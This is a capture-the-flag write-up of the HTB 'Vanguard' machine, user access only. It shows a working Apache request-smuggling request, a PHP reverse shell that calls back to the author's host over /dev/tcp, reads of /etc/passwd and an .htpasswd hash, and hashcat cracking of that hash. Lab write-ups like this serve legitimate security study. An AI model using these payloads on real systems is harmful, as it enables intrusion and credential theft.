HTB Business CTF 2023 Writeup - FullPwn - Vanguard (user only)
In this challenge, I combined an insecure file upload with request smuggling to get a shell on the machine. The CTF ended before I could get root.
Easy
Enumeration
I ran rustscan to check for open ports.
$ rustscan -a target -- -A -Pn | tee rust.txt
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/ehogue/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.246.192:22
Open 10.129.246.192:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
...
Completed NSE at 14:48, 0.00s elapsed
Nmap scan report for target (10.129.246.192)
Host is up, received user-set (0.029s latency).
Scanned at 2023-07-16 14:48:12 EDT for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.3 (protocol 2.0)
| ssh-hostkey:
| 256 8e:bc:b2:f4:1b:e8:62:ac:bd:63:97:80:25:a1:7e:fe (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKEk9a4Mu0XiCxo4egKo7ivgQMv7bG3Ufx7xL3YzMCjFc8VDkyE/klk0t7x9G2UXF7OFLifl2xopRS0oyl9iiAk=
| 256 c0:50:00:d3:2e:a4:76:b0:da:52:f3:43:ba:ef:ec:11 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0eEvnRiwxFz3KCGQ3tPlgyv/50TVQIGNPrEKvi+pd1
80/tcp open http syn-ack Apache httpd 2.4.55 ((Unix) PHP/8.2.8)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://vanguard.htb/
|_http-server-header: Apache/2.4.55 (Unix) PHP/8.2.8
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Ports 22 (SSH) and 80 (HTTP) where open. I added ‘vanguard.htb’ to my hosts file. UDP and subdomains scans did not find anything of interest.
Website
I looked at the website in a browser.
The site was simple. But there was a link to upload files.
I tried to upload files and quickly found that I could upload PHP files. But I did not know where the files were stored, and if I could access them. I found a ‘/uploads’ endpoint, but it was password protected.
I ran Feroxbuster on the site to find hidden pages. It found that ‘/server-info’ was accessible.
From this page, I found some information about the Apache configuration.
Current Configuration:
In file: /etc/httpd/conf/httpd.conf
556: <VirtualHost *:80>
563: ProxyPassReverse "/leaders/" "http://127.0.0.1:8080/"
568: <Location /uploads*>
573: ProxyPass "http://127.0.0.1:8080/uploads/"
574: ProxyPassReverse "http://127.0.0.1:8080/uploads/"
: </Location>
: </VirtualHost>
Current Configuration:
In file: /etc/httpd/conf/httpd.conf
556: <VirtualHost *:80>
561: RewriteEngine on
562: RewriteRule "^/leaders/(.*)" "http://127.0.0.1:8080/leader.php?id=$1" [P]
565: RewriteCond %{HTTP_HOST} !^vanguard.htb$
566: RewriteRule ^(.*)$ http://vanguard.htb$1 [R=permanent,L]
: </VirtualHost>
With this information, and the Apache version number (2.4.55) identified by nmap, I looked for known vulnerabilities. I found it was vulnerable to request smuggling. And it was very easy to exploit.
I took the example code from the site and modified it to access the test.php
file I had uploaded when testing the file upload.
GET /leaders/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/uploads/test.php HTTP/1.1
Host: vanguard.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
The file was making a web request to my machine. And I got the hit. I uploaded a new file with a reverse shell in it.
<?php
echo `bash -c 'bash -i >& /dev/tcp/10.10.14.54/4444 0>&1'`;
When I accessed it with the request smuggling, I got a hit on my netcat listener.
$ nc -klvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.246.192] 54416
bash: cannot set terminal process group (269): Inappropriate ioctl for device
bash: no job control in this shell
[http@vanguard uploads]$
Getting a User
After I was connected, I looked for ways to get a user. I read /etc/passwd
and saw that there was a maximus user on the box.
[http@vanguard vanguard]$ cat /etc/passwd
cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin
http:x:33:33::/srv/http:/usr/bin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin
systemd-coredump:x:981:981:systemd Core Dumper:/:/usr/bin/nologin
systemd-network:x:980:980:systemd Network Management:/:/usr/bin/nologin
systemd-oom:x:979:979:systemd Userspace OOM Killer:/:/usr/bin/nologin
systemd-journal-remote:x:978:978:systemd Journal Remote:/:/usr/bin/nologin
systemd-resolve:x:977:977:systemd Resolver:/:/usr/bin/nologin
systemd-timesync:x:976:976:systemd Time Synchronization:/:/usr/bin/nologin
tss:x:975:975:tss user for tpm2:/:/usr/bin/nologin
uuidd:x:68:68::/:/usr/bin/nologin
maximus:x:1000:1000::/home/maximus:/bin/bash
From the Apache configuration, I knew there was an .htpasswd
file on the server.
[http@vanguard http]$ cat /etc/httpd/.htpasswd
cat /etc/httpd/.htpasswd
maximus-webadmin:$apr1$4uK/teeQ$8gAFoYWl7ba5Vy7Bjy3nK/
I saved the hash in a file and used hashcat
to crack it.
$ hashcat -a0 hash.txt /usr/share/seclists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
$apr1$4uK/teeQ$8gAFoYWl7ba5Vy7Bjy3nK/:100%snoopy
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$4uK/teeQ$8gAFoYWl7ba5Vy7Bjy3nK/
Time.Started.....: Sun Jul 16 16:22:45 2023 (10 mins, 1 sec)
Time.Estimated...: Sun Jul 16 16:32:46 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 22607 H/s (7.72ms) @ Accel:64 Loops:500 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13476480/14344384 (93.95%)
Rejected.........: 0/13476480 (0.00%)
Restore.Point....: 13476096/14344384 (93.95%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 100003470 -> 100%prince
Hardware.Mon.#1..: Util: 94%
Started: Sun Jul 16 16:22:26 2023
Stopped: Sun Jul 16 16:32:47 2023
I used the password to reconnect to the server as maximus and read the user flag.
$ ssh maximus@target
maximus@target's password:
[maximus@vanguard ~]$ cat user.txt
HTB{h3y_l0ok_aT_mE_Im_a_bLu3pR1nT_sMUggL3r}
This is as far as I went. I spent the few minutes I had left trying to get root. But the CTF ended before I had time to root the box.